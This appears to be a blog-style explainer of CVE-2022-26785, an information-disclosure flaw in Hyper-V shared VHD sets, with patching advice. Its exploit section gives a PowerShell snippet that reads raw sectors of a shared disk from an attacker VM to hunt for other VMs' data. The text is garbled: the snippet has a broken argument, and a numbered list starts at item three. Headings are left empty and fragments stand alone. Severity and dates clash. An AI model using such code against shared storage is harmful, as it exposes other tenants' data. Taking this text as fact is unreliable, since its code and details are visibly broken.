Windows Hyper-V is a powerful hypervisor used for running virtual machines. Discovered in 2022, CVE-2022-26785 is a critical information disclosure vulnerability that affects Shared Virtual Hard Disks (VHDs) in Hyper-V. Compared to other closely numbered vulnerabilities—like CVE-2022-24490, CVE-2022-24539, and CVE-2022-26783—this CVE stands out for its unique attack vector and impact.
Let’s break down what CVE-2022-26785 is, how it can be exploited, and, most importantly, how you can protect your systems.
What is CVE-2022-26785?
At its core, CVE-2022-26785 is an information disclosure flaw in the way Windows Hyper-V handles shared virtual hard disks. When multiple virtual machines (VMs) access a VHD set, improper isolation or permission checks can allow a malicious VM to read data it shouldn't have access to.
Microsoft rates this as Important because it could let an attacker in a guest VM see sensitive details belonging to other VMs that share the same VHD set.
Technical Details
Shared Virtual Hard Disks (VHD Sets) let you attach a single virtual disk to several VMs simultaneously. This is handy for guest clusters—but it also introduces risk if access controls aren’t airtight.
CVE-2022-26785 exists because:
Target VMs also attach to that VHD set
3. The attacker performs a carefully crafted read on the VHD set’s virtual disk file, exposing information belonging to other VMs
It’s important to note: no code execution is needed—just the ability to read from disk.
Exploit Example (Code Snippet)
Suppose you have two VMs, VM-A (the attacker) and VM-B (the victim), both connected to a shared VHD set ClusterDisk.vhdset. The attacker can mount the disk inside their VM and access uninitialized disk sectors or VHD-level metadata.
Below is a rough PowerShell code snippet that demonstrates how an attacker might scan the disk looking for data fragments:
# PowerShell script running inside the attacker's VM (VM-A)
# Requires admin privileges or disk access within the VM
# Get all physical disks
$disks = Get-Disk
# Iterate through each disk and look for the cluster shared VHD set
foreach ($disk in $disks) {
if ($disk.FriendlyName -like "*ClusterDisk*") {
$number = $disk.Number
# Open the physical disk for raw access
$handle = [System.IO.File]::Open("\\.\PhysicalDrive$number", 'Open', 'Read')
$bytes = New-Object byte[] 4096
$handle.Read($bytes, , $bytes.Length) | Out-Null
$handle.Close()
# Analyze the bytes for interesting information
$hex = [BitConverter]::ToString($bytes)
Write-Output "First 4096 bytes of ClusterDisk: $hex"
}
}
This raw read may expose file fragments or metadata left by another VM, depending on the timing and the way Hyper-V shares the disk.
Potentially extract credentials, configuration secrets, or user data
This becomes especially dangerous in multi-tenant or clustered environments.
References
- Microsoft Security Update Guide - CVE-2022-26785
- Official Fix Details from Microsoft
- Understanding and Using Shared Virtual Hard Disks with Hyper-V
How is CVE-2022-26785 Different from the Others?
CVE-2022-26785: Specifically about info disclosure from shared VHD sets in clustered Hyper-V.
How to Protect Yourself
Apply patches now!
Microsoft released fixes as part of the May 2022 updates.
- For Windows Server 2016/2019/2022 and Windows 10/11 with Hyper-V roles, make sure you have installed security updates from or after May 2022.
General advice:
Conclusion
CVE-2022-26785 is a potent reminder that even the most useful features—like shared storage—can introduce risks. Administrators running clustered Hyper-V setups should patch without delay, audit their VM configurations, and stay vigilant in managing shared resources.
If you want to dig deeper, check out the official Microsoft Security Update Guide entry. For security professionals and IT teams, it’s another example of how information disclosure can appear in the most unexpected places.
Timeline
Published on: 04/15/2022 19:15:00 UTC
Last modified on: 04/25/2022 16:27:00 UTC